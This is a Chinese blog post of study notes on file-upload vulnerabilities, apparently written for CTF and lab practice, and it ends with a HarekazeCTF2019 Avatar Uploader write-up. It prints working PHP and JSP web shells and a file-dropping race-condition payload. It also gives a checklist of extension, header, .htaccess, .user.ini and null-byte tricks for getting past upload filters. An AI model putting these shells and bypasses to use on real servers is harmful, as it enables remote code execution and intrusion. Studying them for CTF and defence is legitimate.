upload-文件上传漏洞笔记(思路加绕过)

已于 2023-11-19 23:07:27 修改
阅读量275 收藏
点赞数 4
文章标签: 笔记 web安全 网络安全
于 2023-11-14 20:17:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/134407068
版权

实例

<?php fputs(fopen('Tony.php','w'),'<?php @eval($_POST["Tony"])?>');?> 条件竞争,访问到会自己生成Tony.php文件 
<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

http://192.168.231.134:8080/5.jsp?pwd=023&i=ls Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)上传后门

upload上传思路:

  1. 先上传图片马(可以绕过JS前端防护和MIME验证)

  2. 之后先直接上传尝试(这里可能会检查文件内容是否有php字符串,<? , 和是否有文件头)

  3. 若有则进行绕过,检查php绕过(短标签绕过):<?=eval($_POST['cmd']);?> <?绕过: 文件头绕过:在文件最前面写入GIF89a

  4. 若没有则进行filename绕过,尝试特殊解析漏洞:php3,php5,phtml ; 大小写绕过:PHP,pHP; 点绕过:php.; 空格绕过:php空格;::$$DATA绕过:`shell.php::$$DATA;双后缀:shell.phphpp;单循环绕过:shell.php. .;假文件名绕过:shell.php/.

    php3
php5
phtml
PHP
PHp
php.
php 
php::$$DATA
phphpp
php. . 
php. .
php . .
php .
php/.

  5. 若没有绕过就可以进行.htaccess绕过和.user.ini绕过,注:如果上传上去导致无法访问文件,请删除GIF89a重试

.htaccess绕过:

GIF89a

<FilesMatch "shell.jpg">

SetHandler application/x-httpd-php

</FilesMatch>

.user.ini绕过:

GIF89a
auto_prepend_file=shell.jpg

注:用蚁剑或菜刀链接实路径的shell.jpg改为index.php

  1. 若这些都不能绕过,则进行白名单绕过,使用0x00截断,0x0a截断。注POST提交时%00要用URL解码或者在Hex里面将值改为00

  2. 若还不行则考虑文件包含漏洞,结合文件包含漏洞进行上传

  3. 若不行则考虑二次渲染绕过(条件竞争绕过)

  4. 最后考虑构造数组进行绕过(数组绕过)

  5. 实际中先看是否有解析漏洞(IIS,Apache,Nginx0),有的话直接绕过就行了

绝对路径拼接漏洞(os.path.join漏洞)

os.path.join(path,*paths)函数用于将多个文件路径连接成一个组合的路径。第一个函数通常包含了基础路径,而之后的每个参数被当作组件拼接到基础路径之后。

然而,这个函数有一个少有人知的特性,如果拼接的某个路径以 / 开头,那么包括基础路径在内的所有前缀路径都将被删除,该路径将视为绝对路径

os.path.join()函数:
第一个以”/”开头的参数开始拼接,之前的参数全部丢弃,当有多个时,从最后一个开始

Apache文件上传漏洞:

  1. 低版本Apache有从右到左开始判断解析,如果右边是不可识别后缀则往左看,如shell.php.123

  2. AddHandler导致的解析漏洞

    如果服务器给.php后缀添加了处理器:AddHandler application/x-httpd-php.php
    那么,在有多个后缀的情况下,只要包含.php后缀的文件就会被识别出php文件进行解析,不需要是最后一个后缀,可绕过白名单过滤,如:shell.php.jpg

  3. Apache换行解析漏洞

函数

finfo_file()和getimagesize()验证文件类型的区别

finfo_file

finfo_file():通过图片的内容头进制分析图片的类型,没有检测文件内容,分析的不太全面
注:这里的内容头,拿png举例:不仅仅是最前面的png,还有别的,如:

在这里插入图片描述

getimagesize

getimagesize():通过文件头和内容,分析的比较全面,返回分析结果,以数组的形式
getimagesize()函数返回图片信息的数组
索引 0 给出的是图像宽度的像素值
索引 1 给出的是图像高度的像素值
索引 2 给出的是图像的类型,返回的是数字,其中1 = GIF,2 = JPG,3 = PNG,4 = SWF,5 = PSD,6 = BMP,7 = TIFF(intel byte order),8 = TIFF(motorola byte order),9 = JPC,10 = JP2,11 = JPX,12 = JB2,13 = SWC,14 = IFF,15 = WBMP,16 = XBM
索引 3 给出的是一个宽度和高度的字符串,可以直接用于 HTML 的 <image> 标签
索引 bits 给出的是图像的每种颜色的位数,二进制格式
索引 channels 给出的是图像的通道值,RGB 图像默认是 3
索引 mime 给出的是图像的 MIME 信息,此信息可以用来在 HTTP Content-type 头信息中发送正确的信息,如: header("Content-type: image/jpeg");

实例:[HarekazeCTF2019]Avatar Uploader 1

文章:[HarekazeCTF2019]Avatar Uploader 1

思路:

1.首先题目给了源码,update.php的有用,毕竟是文件上传
<?php
error_reporting(0);
 
require_once('config.php');
require_once('lib/util.php');
require_once('lib/session.php');
 
$session = new SecureClientSession(CLIENT_SESSION_ID, SECRET_KEY);
 
// check whether file is uploaded
if (!file_exists($_FILES['file']['tmp_name']) || !is_uploaded_file($_FILES['file']['tmp_name'])) {
    error('No file was uploaded.');
}
 
// check file size
if ($_FILES['file']['size'] > 256000) {
    error('Uploaded file is too large.');
}
 
// check file type
$finfo = finfo_open(FILEINFO_MIME_TYPE);//获取文件MIME类型
$type = finfo_file($finfo, $_FILES['file']['tmp_name']);
finfo_close($finfo);
if (!in_array($type, ['image/png'])) {
    error('Uploaded file is not PNG format.');
}
 
// check file width/height
$size = getimagesize($_FILES['file']['tmp_name']);
if ($size[0] > 256 || $size[1] > 256) {
    error('Uploaded image is too large.');
}
if ($size[2] !== IMAGETYPE_PNG) {
    // I hope this never happens...
    error('What happened...? OK, the flag for part 1 is: <code>' . getenv('FLAG1') . '</code>');
}
 
// ok
$filename = bin2hex(random_bytes(4)) . '.png';
move_uploaded_file($_FILES['file']['tmp_name'], UPLOAD_DIR . '/' . $filename);
 
$session->set('avatar', $filename);
flash('info', 'Your avatar has been successfully updated!');
redirect('/');

发现只要finfo_file验证上传的文件为png,并且getimagesize验证的上传文件不为png就可以得到flag

payload

1.利用
finfo_file():通过图片的内容头进制分析图片的类型,没有检测文件内容,分析的不太全面
getimagesize():通过文件头和内容,分析的比较全面,返回分析结果,以数组的形式
这两个函数的特点
2.我们尝试删除png文件的内容,直到getimagesize检测到不是png为止,到最后只剩下了内容头,得到flag

在这里插入图片描述

尘佑不尘
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PHP、Apache环境中部署upload-labs(文件漏洞靶场)
01-08
PHP、Apache环境中部署upload-labs(文件漏洞靶场)
upload-labs之第十九和二十关以及总结
田田云逸的博客
10-28 1518
Pass19 打开第十九关,发现上的地方还可以定义上文件名 再看看提示 这里说这个文件名是用的post方式递的,那么看看源码到底要怎么绕过 $is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array("php","php5","php4","php3","php2","html","htm".
Upload-labs 1-21关 靶场通关笔记(含代码审计)
weixin_54894046的博客
10-15 6660
Upload-labs 1-21关 靶场通关笔记(含代码审计)
upload-labs详解1-19关通关全解(最全最详细一看就会)
热门推荐
qq_53003652的博客
04-05 2万+
upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上漏洞的靶场。旨在帮助大家对上漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上方式。
[Web安全学习] ctfshow-文件总结
Y1seco的博客
08-03 570
图片马 <?php eval($_POST[a]);?> 文件后缀修改为jpg,png,gif等,burp修改上成功后的后缀为.php(或其他根据过滤情况) 利用上user.ini进行文件绕过 user.ini说明: 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4292
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
elemetUi 组件--el-upload实现上Excel文件的实例
08-29
主要介绍了elemetUi 组件--el-upload实现上Excel文件的实例的相关资料,希望通过本文大家能够实现这样的功能,需要的朋友可以参考下
文件upload-labs(一)
01-08
通过上攻击性文件(木马,病毒,恶意脚本)绕过检测到服务器并执行; 个人觉得不喜欢这些概念,通过实操更能理解和掌握; 使用xampp、phpstudy、docker搭建upload-labs,三者都可,docker最方便但是我不是太熟悉...
aliyun-upload-sdk-1.5.0.zip
06-09
aliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-...
文件漏洞练习靶场upload-labs
07-05
文件漏洞练习靶场upload-labs内有文件漏洞的各种类型绕过的例题,非常全面,对文件漏洞的理解、利用非常有帮助。
[HarekazeCTF2019]Avatar Uploader 1
snowlyzz的博客
09-14 525
详细讲解 getimagesize函数原理和绕过
BUU刷题记录——4
weixin_43610673的博客
08-31 1594
[HarekazeCTF2019]Avatar Uploader 1 finfo_file用来判断上图片类型,getimagesize可以判断文件像素大小,并且再进行一次类型判断。 finfo_file函数应该是直接打开文件,来获取文件类型。而getimagesize函数是通过图片尺寸数组中第三个元素是否为int型的3来判断的。 finfo_file 可以识别 png 图片( 十六进制下 )的第一行,而 getimagesize 不可以。 所以我们只要保持png头就可以,将他的相符判断
getimagesize函数介绍
weixin_30814319的博客
09-17 280
getimagesize(); 返回结果说明 索引 0 给出的是图像宽度的像素值 索引 1 给出的是图像高度的像素值 索引 2 给出的是图像的类型,返回的是数字,其中1 = GIF,2 = JPG,3 = PNG,4 = SWF,5 = PSD,6 = BMP,7 = TIFF(intel byte order),8 = TIFF(motorola byte order),9 = JP...
BUUCTF HarekazeCTF2019 babyrop2
doudoudedi
11-01 1235
这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp: #coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./baby...
BUUCTF--[HarekazeCTF2019]Avatar Uploader 1
qq_46263951的博客
07-19 358
name随便输一个,进入之后看到是让上头像,这个应该是一个文件漏洞 接下来分析所给的源码 <?php error_reporting(0); require_once('config.php'); require_once('lib/util.php'); require_once('lib/session.php'); $session = new SecureClientSession(CLIENT_SESSION_ID, SECRET_KEY); // check wh..
PHP获取远程图片宽、高
李维山的博客
02-20 446
使用函数 getimagesize: <?php $remote_png_url = 'http://xxx.png'; $img_data = getimagesize($remote_png_url); print_r($img_data); 打印结果如下: Array ( [0] => 290 [1] => 69 [2] => 3 [3] => width="290" height="69" [b
BUUCTF:[HarekazeCTF2019]Avatar Uploader 1
../../../../../../../
08-19 1216
打开靶机 登录后是一个文件界面 题目给了源码,在upload.php中,有两个关键函数,file_info 用来返回一个文件的信息即判断图片上类型为png,getimagesize 用于获取图像大小及相关信息,并进行再一次类型判断,如果文件类型不为png,即返回flag 因为file_info判断为png,而getimagesize判断结构不能为png,通过了解知道file_info可以识别 png 图片( 十六进制下 )的第一行,而getimagesize 不可以 找一张符合条件的png图片,
OpenMVS学习笔记(一):WSL编译安装测试
最新发布
sinat_31425585的博客
05-09 225
OpenMVS学习笔记
金和oa jc6 ntko-upload 任意文件漏洞
01-16
然而,金和OA JC6和NTKO-Upload存在一个任意文件漏洞。该漏洞可能会被恶意攻击者利用,上恶意文件,从而对系统造成潜在的安全风险。 恶意上文件可能包含恶意代码、病毒或其他有害的文件,攻击者可通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值